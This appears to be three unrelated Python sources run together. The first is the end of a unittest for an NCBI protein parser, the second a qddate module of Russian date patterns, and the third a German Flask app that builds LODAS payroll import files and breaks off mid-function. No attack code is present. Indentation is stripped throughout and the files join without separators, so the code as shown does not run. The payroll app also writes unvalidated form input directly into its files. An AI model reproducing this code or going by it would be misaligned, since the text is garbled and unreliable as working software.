path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = {
'Protein name': 'Glucose-1-phosphate adenylyltransferase', 'Organism': 'Oscillatoria nigro-viridis PCC 7112',
'EC Number': '2.7.7.27'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = { 'Protein name': 'aminodeoxychorismate lyase',
'Organism': 'Geobacillus'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
def test_init(self):
"""
Tests the initialization of the NCBI class and Protein inner class.
:param self: An instance of the NCBI_tests class.
"""
ncbi = NCBI()
self.assertTrue(str(type(ncbi)) == "<class 'classes.NCBI.NCBI'>")
self.assertTrue(str(type(ncbi.protein)) \
== "<class 'classes.NCBI.NCBI.Protein'>")
self.assertTrue(ncbi.root_path == "https://www.ncbi.nlm.nih.gov")
self.assertTrue(ncbi.protein.root_path \
== "https://www.ncbi.nlm.nih.gov/protein/")
def test_execution(self):
"""
Tests the ability of the NCBI_tests class to run a test.
:param self: An instance of the NCBI_tests class.
"""
self.assertTrue(True)
if __name__ == '__main__':
    unittest.main()

# File: qddate/patterns/ru.py (ivbeg/qddate, BSD-3-Clause)
# -*- coding: utf-8 -*-
from pyparsing import Word, nums, alphas, oneOf, lineStart, lineEnd, Optional, restOfLine, Literal, ParseException, CaselessLiteral
from .base import BASE_DATE_PATTERNS
RUS_MONTHS_ORIG = [u'Январь', u'Февраль', u'Март', u'Апрель', u'Май', u'Июнь', u'Июль', u'Август', u'Сентябрь', u'Октябрь', u'Ноябрь', u'Декабрь']
RUS_MONTHS_ORIG_LC = [u'январь', u'февраль', u'март', u'апрель', u'май', u'июнь', 'июль', u'август', u'сентябрь', u'октябрь', u'ноябрь', u'декабрь']
RUS_MONTHS = [u'Января', u'Февраля', u'Марта', u'Апреля', u'Мая', u'Июня', u'Июля', u'Августа', u'Сентября', u'Октября', u'Ноября', u'Декабря']
RUS_MONTHS_LC = [u'января', u'февраля', u'марта', u'апреля', u'мая', u'июня', u'июля', u'августа', u'сентября', u'октября', u'ноября', u'декабря']
RUS_WEEKDAYS = [u'Понедельник', u'Вторник', u'Среда', u'Четверг', u'Пятница', u'Суббота', u'Воскресение']
RUS_WEEKDAYS_LC = [u'понедельник', u'вторник', u'среда', u'четверг', u'пятница', u'суббота', u'воскресение']
RUS_YEARS = [u'г.', u'года']
# Russian months map
ru_mname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS) if m)
rulc_mname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_LC) if m)
ru_origmname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_ORIG) if m)
rulc_origmname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_ORIG_LC) if m)
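The four maps above all use the same enumerate idiom to turn a month-name list into a name-to-number dict, skipping any empty placeholder entries. A minimal standalone sketch of the idiom (English names used purely for illustration):

```python
MONTHS = ["January", "February", "March"]

# Map each month name to its 1-based month number; `if m` skips empty slots.
name2mon = dict((m, i + 1) for i, m in enumerate(MONTHS) if m)

assert name2mon["March"] == 3
```

The `setParseAction` calls in `BASE_PATTERNS_RU` then use these dicts to replace a matched Russian month name with its numeric value at parse time.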
BASE_PATTERNS_RU = {
'pat:rus:years' : oneOf(RUS_YEARS),
'pat:rus:weekdays': oneOf(RUS_WEEKDAYS),
'pat:rus:weekdays_lc': oneOf(RUS_WEEKDAYS_LC),
# months names
'pat:rus:months': oneOf(RUS_MONTHS).setParseAction(lambda t: ru_mname2mon[t[0]]),
'pat:rus:months:lc': oneOf(RUS_MONTHS_LC).setParseAction(lambda t: rulc_mname2mon[t[0]]),
# Original months names, very rarely in use
'pat:rus:monthsorig' : oneOf(RUS_MONTHS_ORIG).setParseAction(lambda t: ru_origmname2mon[t[0]]),
'pat:rus:monthsorig:lc' : oneOf(RUS_MONTHS_ORIG_LC).setParseAction(lambda t: rulc_origmname2mon[t[0]]),
}
PATTERNS_RU = [
# Russian patterns
{'key': 'dt:date:date_rus', 'name': 'Date with russian month', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus2', 'name': 'Date with russian month and year word', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year') + Optional(BASE_PATTERNS_RU['pat:rus:years']).suppress(), 'length': {'min': 13, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus3', 'name': 'Date with russian year', 'pattern': BASE_DATE_PATTERNS['pat:date:d.m.yyyy'] + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 14, 'max': 20}, 'format': "%d.%m.%Y"},
{'key': 'dt:date:date_rus_lc1', 'name': 'Date with russian month', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 10, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus_lc2', 'name': 'Date with russian month with year word', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Word(nums, exact=4).setResultsName('year') + Optional(BASE_PATTERNS_RU['pat:rus:years']).suppress(), 'length': {'min': 13, 'max': 25}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:weekday_rus', 'name': 'Date with russian month and weekday', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays'] + Optional(',') + Word(nums, min=1, max=2) + BASE_PATTERNS_RU['pat:rus:months'] + Optional(Literal(',')).suppress() + Word(nums, exact=4).setResultsName('year') + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 13, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:weekday_rus_lc1', 'name': 'Date with russian month and weekday', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays'] + Optional(',') + Word(nums, min=1, max=2) + BASE_PATTERNS_RU['pat:rus:months:lc'] + Optional(Literal(',')).suppress() + Word(nums, exact=4).setResultsName('year') + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 13, 'max': 25}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:rus_rare_2', 'name': 'Date with russian month with dots as divider', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional('.').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional('.').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d.%m.%Y", 'filter': 1},
{'key': 'dt:date:rus_rare_3', 'name': 'Date with russian month with dots as divider with low case months', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Literal('.').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Literal('.').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d.%m.%Y", 'filter': 1},
# KHMB Bank http://www.kbhmb.ru/news/
{'key': 'dt:date:rus_rare_5', 'name': 'Russian date starts with month name', 'pattern': BASE_PATTERNS_RU['pat:rus:monthsorig'].setResultsName('month') + Word(nums, min=1, max=2).setResultsName('day') + Literal(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 13, 'max': 22}, 'format': "%d %m %Y", 'filter': 1},
# Bank Rus format http://www.bankrus.ru/about/info/g1/news
{'key': 'dt:date:rus_rare_6', 'name': 'Russian date starts with weekday followed by month name', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays_lc'].suppress() + Literal(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Word(nums, min=1, max=2).setResultsName('day') + Literal(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 13, 'max': 22}, 'format': "%d %m %Y", 'filter': 1},
]
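Each entry above pairs a pyparsing pattern with a strftime-style 'format' string. A minimal, self-contained sketch (the `MONTHS_RU` table and the `normalize` helper are assumptions for illustration, not part of the module) of how matched day/month-name/year tokens might be turned into a date:

```python
from datetime import datetime

# Stand-in month lookup; the real code resolves names via BASE_PATTERNS_RU.
MONTHS_RU = {'января': '1', 'февраля': '2', 'марта': '3'}

def normalize(day, month_name, year):
    """Turn matched day/month-name/year tokens into a datetime,
    mirroring the "%d %m %Y" 'format' entries above."""
    text = day + " " + MONTHS_RU[month_name] + " " + year
    return datetime.strptime(text, "%d %m %Y")

# e.g. normalize("5", "марта", "2020") == datetime(2020, 3, 5)
```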
from flask import Flask
from flask import request
import os, webbrowser
from flask import render_template
from shutil import copyfile
from fpdf import FPDF
import setting
app = Flask(__name__)
@app.route('/')
def homepage():
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
var_textabr="Abrechnungszeitraum ist gewählt "
else:
var_abrmonat="MM"
var_abrjahr="JJJJ"
var_textabr="und wähle dann den Abrechnungszeitraum! "
if os.path.exists("daten/basisdaten.txt"):
var_textstamm="Konfiguration ist vorhanden "
else:
var_textstamm="Lege zuerst eine Konfiguration an "
var_text=var_textstamm+var_textabr
# Pass the version from setting to index.html
var_version_titel = setting.Version_Titel
var_version_program = setting.Version_Program
return render_template('index.html', v_version_program=var_version_program, v_version_titel=var_version_titel, v_text=var_text, v_monat=var_abrmonat, v_jahr=var_abrjahr)
# Block ok !
@app.route('/index.html', methods=['POST', 'GET'])
def index():
if request.method == 'POST':
fileziel=open("daten/abrechnungszeitraum.txt","w")
fileziel.write(request.form['form_monat']+"|"+request.form['form_jahr'])
fileziel.close()
var_textabr="Abrechnungszeitraum ist gewählt "
var_abrmonat=request.form['form_monat']
var_abrjahr=request.form['form_jahr']
elif os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
var_textabr="Abrechnungszeitraum ist gewählt "
else:
var_abrmonat="MM"
var_abrjahr="JJJJ"
var_textabr="Fehler: kein Abrechnungszeitraum gewählt! "
if os.path.exists("daten/basisdaten.txt"):
var_textstamm="Konfiguration ist vorhanden "
else:
var_textstamm="Fehler: Konfiguration ist nicht vorhanden! "
var_text=var_textstamm+var_textabr
# Pass the version from setting to index.html
var_version_titel = setting.Version_Titel
var_version_program = setting.Version_Program
return render_template('index.html', v_version_program=var_version_program, v_version_titel=var_version_titel, v_text=var_text, v_monat=var_abrmonat, v_jahr=var_abrjahr)
#Block ok
@app.route('/protokoll.html', methods=['POST', 'GET'])
def protokoll():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden!"
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Es ist noch kein Abrechnungszeitraum ausgewählt! "
return render_template('index.html', v_text=var_text)
# Create a PDF
if os.path.exists("daten/abrechnungsdaten.txt"):
class PDF(FPDF):
def header(self):
# Logo
self.image('static/image001.png', 10, 8, 33)
# Arial bold 15
self.set_font('Arial', 'B', 15)
# Move to the right
self.cell(80)
# Title
self.cell(80, 10, 'Erfassungsprotokoll', 1, 0, 'C')
# Line break
self.ln(20)
# Page footer
def footer(self):
# Position at 1.5 cm from bottom
self.set_y(-15)
# Arial italic 8
self.set_font('Arial', 'B', 8)
# Page number
self.cell(0, 10, 'Seite ' + str(self.page_no()) + '/{nb}', 0, 0, 'C')
# Instantiation of inherited class
pdf = PDF()
pdf.alias_nb_pages()
pdf.add_page()
pdf.set_font('Arial', '', 10)
protokoll=open("daten/abrechnungsdaten.txt", "r")
for line in protokoll:
pdf.cell(0, 5, str(line), 0, 1)
pdf.output('protokoll.pdf', 'F')
protokoll.close()
# Open the file
os.startfile('protokoll.pdf')
else:
var_text="Fehler: Es sind keine Abrechnungsdaten erfasst! "
return render_template('index.html', v_text=var_text)
return render_template('index.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr)
# Protokoll ok
# data preparation could still be improved
#### Personnel questionnaire data ####
@app.route('/personalstammdaten.html', methods=['POST', 'GET'])
def personalstammdaten():
## Are master data and accounting period present?
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Es ist noch kein Abrechnungszeitraum ausgewählt! "
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
if os.path.exists("daten/abrechnungsdaten.txt"):
## Open the file and append the data
# print("Datei offen")
fileziel=open("daten/abrechnungsdaten.txt","a")
else:
## Create the file and write the header data
fileziel=open("daten/abrechnungsdaten.txt","w")
# write to the LODAS import file
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# note: date exactly as delivered by Bootstrap
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;rv_beitragsgruppe#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;regelm_az_mo#psd;regelm_az_di#psd;regelm_az_mi#psd;regelm_az_do#psd;regelm_az_fr#psd;regelm_az_sa#psd;regelm_az_so#psd;")
# 20200114 fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
if request.form['form_personalnummer'] == "":
pass
# error is caught by the frontend
# print("Fehler PNR")
else:
fileziel.write("\n\n[Stammdaten]\n20;"+request.form['form_personalnummer']+";"+request.form['form_eintrittsdatum']+";"+request.form['form_austrittsdatum']+";;;;;;")
fileziel.write("\n21;"+request.form['form_personalnummer']+";'"+request.form['form_name']+"';'"+request.form['form_vorname']+"';'"+request.form['form_strasse']+"';'"+request.form['form_hausnummer']+"';'"+request.form['form_wohnort']+"';"+request.form['form_plz']+";000;"+request.form['form_gebdatum']+";"+request.form['form_geschlecht']+";;"+request.form['form_svnummer']+";;"+request.form['form_geburtsort']+";")
fileziel.write("\n22;"+request.form['form_personalnummer']+";"+request.form['form_berufsbezeichnung']+";"+request.form['form_rvbeitragsgruppe']+";"+request.form['form_pgr']+";"+request.form['form_schulabschluss']+";"+request.form['form_berufsausbildung']+";"+request.form['form_kostenstelle']+";")
# 20200114 fileziel.write("\n22;"+request.form['form_personalnummer']+";"+request.form['form_berufsbezeichnung']+";"+request.form['form_pgr']+";"+request.form['form_schulabschluss']+";"+request.form['form_berufsausbildung']+";"+request.form['form_kostenstelle']+";")
# new: daily working hours added
fileziel.write("\n23;"+request.form['form_personalnummer']+";"+request.form['form_waz']+";"+request.form['form_wazmo']+";"+request.form['form_wazdi']+";"+request.form['form_wazmi']+";"+request.form['form_wazdo']+";"+request.form['form_wazfr']+";"+request.form['form_wazsa']+";"+request.form['form_wazso']+";")
# 20200114 fileziel.write("\n23;"+request.form['form_personalnummer']+";"+request.form['form_waz']+";")
fileziel.write("\n24;"+request.form['form_personalnummer']+";"+request.form['form_steuerid']+";"+request.form['form_artderbeschaeftigung']+";"+request.form['form_steuerklasse']+";"+request.form['form_kinderfreibetrag']+";;")
fileziel.write("\n25;"+request.form['form_personalnummer']+";"+request.form['form_elterneigenschaft']+";"+request.form['form_KV']+";"+request.form['form_RV']+";"+request.form['form_AV']+";"+request.form['form_PV']+";")
fileziel.write("\n26;"+request.form['form_personalnummer']+";5;"+request.form['form_iban']+";")
if request.form['form_gehalt'] == "1":
if request.form['form_eurovorkomma'] == "":
pass
else:
# salary, eLOA 1
fileziel.write("\n27;"+request.form['form_personalnummer']+";1;1;"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
elif request.form['form_gehalt'] == "2":
# fixed wage, eLOA 51
fileziel.write("\n27;"+request.form['form_personalnummer']+";1;51;"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
elif request.form['form_gehalt'] == "3":
# hourly wage
fileziel.write("\n28;"+request.form['form_personalnummer']+";"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
else:
pass
fileziel.write("\n[Hinweisdaten]\n")
fileziel.write("Hinweis: PNR: "+request.form['form_personalnummer']+" Krankenkasse: "+request.form['form_krankenkasse']+" Staatsangehörigkeit: "+request.form['form_staatsang']+"\n")
if request.form['form_geburtsland'] == "" and request.form['form_steuerklasse'] == "":
pass
else:
fileziel.write("Hinweis: PNR: "+request.form['form_personalnummer']+" Geburtsland: "+request.form['form_geburtsland']+" Steuerklasse "+request.form['form_steuerklasse'])
## error
if request.form['form_kinderfreibetrag'] == "" and request.form['form_konfession'] == "":
pass
else:
fileziel.write(" Kinderfreibetrag "+request.form['form_kinderfreibetrag']+" Konfession: "+request.form['form_konfession']+"\n")
if request.form['form_freiertext'] == "":
pass
else:
fileziel.write("\n Text aus der Erfassung: "+request.form['form_freiertext']+"\n")
fileziel.close()
else:
pass
return render_template('personalstammdaten.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr)
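The `fileziel.write()` calls above build each LODAS record by concatenating a record number and semicolon-separated field values. A small, self-contained sketch (the `lodas_record` helper and the sample values are assumptions, not part of the original file) of that record format:

```python
def lodas_record(satz_nr, *fields):
    """Join a record number and its field values with ';' plus a trailing ';',
    matching the shape of the write() calls above."""
    return ";".join([str(satz_nr)] + list(fields)) + ";"

# e.g. record 26 (bank data): lodas_record(26, "0042", "5", "DE02120300000000202051")
# produces "26;0042;5;DE02120300000000202051;"
```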
@app.route('/basisdaten.html', methods=['POST', 'GET'])
def basisdaten():
##############################################################
### Create the master data (configuration) for data entry
### Consultant number, client, and wage types with label: 5 for hours, 5 for amounts
##############################################################
if request.method == 'POST':
fileziel=open("daten/basisdaten.txt","w")
# write to the base data file
fileziel.write(request.form['form_berater']+"|"+request.form['form_mandant']+"|")
if (request.form['loa_ns1'] != "" and request.form['loa_ts1'] != "") and (request.form['loa_ns1'] != "Nummer") :
fileziel.write(request.form['loa_ns1']+"|"+request.form['loa_ts1']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns2'] != "" and request.form['loa_ts2'] != "") and (request.form['loa_ns2'] != "Nummer"):
fileziel.write(request.form['loa_ns2']+"|"+request.form['loa_ts2']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns3'] != "" and request.form['loa_ts3'] != "" ) and (request.form['loa_ns3'] != "Nummer"):
fileziel.write(request.form['loa_ns3']+"|"+request.form['loa_ts3']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns4'] != "" and request.form['loa_ts4'] != "") and (request.form['loa_ns4'] != "Nummer"):
fileziel.write(request.form['loa_ns4']+"|"+request.form['loa_ts4']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns5'] != "" and request.form['loa_ts5'] != "") and (request.form['loa_ns5'] != "Nummer"):
fileziel.write(request.form['loa_ns5']+"|"+request.form['loa_ts5']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb1'] != "" and request.form['loa_tb1'] != "") and (request.form['loa_nb1'] != "Nummer"):
fileziel.write(request.form['loa_nb1']+"|"+request.form['loa_tb1']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb2'] != "" and request.form['loa_tb2'] != "") and (request.form['loa_nb2'] != "Nummer"):
fileziel.write(request.form['loa_nb2']+"|"+request.form['loa_tb2']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb3'] != "" and request.form['loa_tb3'] != "") and (request.form['loa_nb3'] != "Nummer"):
fileziel.write(request.form['loa_nb3']+"|"+request.form['loa_tb3']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb4'] != "" and request.form['loa_tb4'] != "") and (request.form['loa_nb4'] != "Nummer"):
fileziel.write(request.form['loa_nb4']+"|"+request.form['loa_tb4']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb5'] != "" and request.form['loa_tb5'] != "") and (request.form['loa_nb5'] != "Nummer"):
fileziel.write(request.form['loa_nb5']+"|"+request.form['loa_tb5'])
else:
fileziel.write("nicht|buchen")
fileziel.close()
else:
pass
return render_template('basisdaten.html')
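The ten near-identical `if` blocks in `basisdaten()` above validate five hours-type and five amount-type wage-type pairs. A sketch (an assumption, not code from the original file) of how that logic could be collapsed into one loop over the field-name pairs:

```python
def loa_fields(form):
    """Build the pipe-separated wage-type section of basisdaten.txt from a
    form-like dict, reproducing the if/else cascade above (each missing or
    placeholder pair becomes "nicht|buchen"; no trailing '|' after the last)."""
    pairs = [("loa_ns%d" % i, "loa_ts%d" % i) for i in range(1, 6)]
    pairs += [("loa_nb%d" % i, "loa_tb%d" % i) for i in range(1, 6)]
    parts = []
    for num_key, txt_key in pairs:
        num = form.get(num_key, "")
        txt = form.get(txt_key, "")
        if num and txt and num != "Nummer":
            parts.append(num + "|" + txt)
        else:
            parts.append("nicht|buchen")
    return "|".join(parts)
```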
###############################################
#### Hours entry and data creation ####
@app.route('/erfassungstunden.html', methods=['POST', 'GET'])
def stundenerfassung():
## read master data - quality assurance still missing
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
# return render_template('basisdaten.html')
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Du hast noch keinen Abrechnungszeitraum angelegt!"
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
if os.path.exists("daten/abrechnungsdaten.txt"):
## Open the file and append the data
fileziel=open("daten/abrechnungsdaten.txt","a")
fileziel.write("\n* Stunden zur Abrechnung von Mitarbeitern\n")
fileziel.write("[Bewegungsdaten]\n")
else:
## Create the file and write the header data
fileziel=open("daten/abrechnungsdaten.txt","w")
# write to the LODAS import file
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# note: date exactly as delivered by Bootstrap
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
fileziel.write("* Stunden zur Abrechnung von Mitarbeitern\n\n")
fileziel.write("[Bewegungsdaten]\n\n")
if request.form['form_personalnummer'] == "" or request.form['form_wert'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_3+";1;"+request.form['form_wert']+";"+request.form['form_kostenstelle']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw2'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_5+";1;"+request.form['fw2']+";"+request.form['fk2']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw3'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_7+";1;"+request.form['fw3']+";"+request.form['fk3']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw4'] == "":
pass
else:
